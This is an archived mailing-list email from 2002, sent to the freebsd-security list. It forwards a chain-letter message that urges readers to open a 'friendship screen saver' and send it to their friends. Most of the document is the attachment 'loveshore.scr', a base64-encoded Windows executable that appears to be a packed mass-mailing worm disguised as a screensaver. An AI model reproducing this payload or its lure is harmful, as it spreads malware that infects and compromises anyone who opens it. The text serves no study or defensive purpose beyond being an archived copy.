<0GY900M7WOS1L8@mxout3.netvision.net.il> for freebsd-security@freebsd.org; Tue, 25 Jun 2002 18:09:42 +0300 (IDT) Date: Tue, 25 Jun 2002 18:08:08 +0000 (PM) From: Hotel Shefayim Subject: Fw: Bullshit relations for you To: freebsd-security@freebsd.org Message-id: <0GY900M7XOS1L8@mxout3.netvision.net.il> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Content-type: multipart/mixed; boundary="Boundary_(ID_0fHgCsHC2RlJuOIdGk1DTg)" iPlanet-SMTP-Warning: Lines longer than SMTP allows found and truncated. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Boundary_(ID_0fHgCsHC2RlJuOIdGk1DTg) Content-type: text/html Content-transfer-encoding: quoted-printable charset="iso-8859-1" Hi
Check the Attachement ..
See u

Hotel Shefayim

----- Original Message -----
From: "screensaverforu" < shakeit@enjoylove.com >
To: < shefayim@netvision.net.il >
Sent: Tue,25 Jun 2002 18:08:08 PM
Subject: Bullshit relations for you


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.enjoylove.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://enjoylove.com/remove?freescreensaver
* Enter your email address (shefayim@netvision.net.il) in the field provided and click "Unsubscri --Boundary_(ID_0fHgCsHC2RlJuOIdGk1DTg) Content-type: application/octet-stream; name=loveshore.scr Content-transfer-encoding: base64 Content-disposition: attachment; filename=loveshore.scr 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 